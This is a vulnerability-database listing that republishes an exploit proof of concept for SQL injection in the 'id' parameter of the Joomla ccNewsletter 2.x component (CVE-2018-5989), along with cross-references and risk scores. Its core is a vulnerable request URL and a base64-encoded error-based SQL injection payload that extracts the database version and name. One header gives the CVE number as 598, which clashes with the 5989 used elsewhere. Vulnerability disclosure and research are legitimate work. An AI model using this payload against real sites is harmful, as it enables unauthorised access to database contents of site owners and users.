Joomla Component ccNewsletter 2.x.x id - SQL Injection

🗓️ 16 Feb 2018 00:00:00Reported by Ihsan SencanType

exploitpack👁 23 Views

Joomla Component ccNewsletter 2.x.x id - SQL Injection CVE-2018-598

Reporter	Title	Published	Views	Family All 10
0day.today	Joomla ccNewsletter 2.x.x Component id - SQL Injection Vulnerability	17 Feb 201800:00	–	zdt
Circl	CVE-2018-5989	16 Feb 201800:00	–	circl
CVE	CVE-2018-5989	17 Feb 201807:00	–	cve
Cvelist	CVE-2018-5989	17 Feb 201807:00	–	cvelist
Exploit DB	Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection	16 Feb 201800:00	–	exploitdb
EUVD	EUVD-2018-17754	7 Oct 202500:30	–	euvd
NVD	CVE-2018-5989	17 Feb 201807:29	–	nvd
OSV	CVE-2018-5989	17 Feb 201807:29	–	osv
Packet Storm	Joomla ccNewsletter 2.x.x SQL Injection	17 Feb 201800:00	–	packetstorm
Prion	Sql injection	17 Feb 201807:29	–	prion

# # # #
# Exploit Title: Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.chillcreations.com/
# Software Link: https://extensions.joomla.org/extension/ccnewsletter/
# Version: 2.x Stable
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5989
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_ccnewsletter&task=removeSubscriber&id=[SQL]
#  
# Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGEnJTIwT1IlMjAoU0VMRUNUJTIwMiUyMEZST00oU0VMRUNUJTIwQ09VTlQoKiksQ09OQ0FUKHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpLEZMT09SKFJBTkQoMCkqMikpeCUyMEZST00lMjBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyUyMEdST1VQJTIwQlklMjB4KWEpLS0lMjBhTXBM
# 
# # # #

16 Feb 2018 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.01085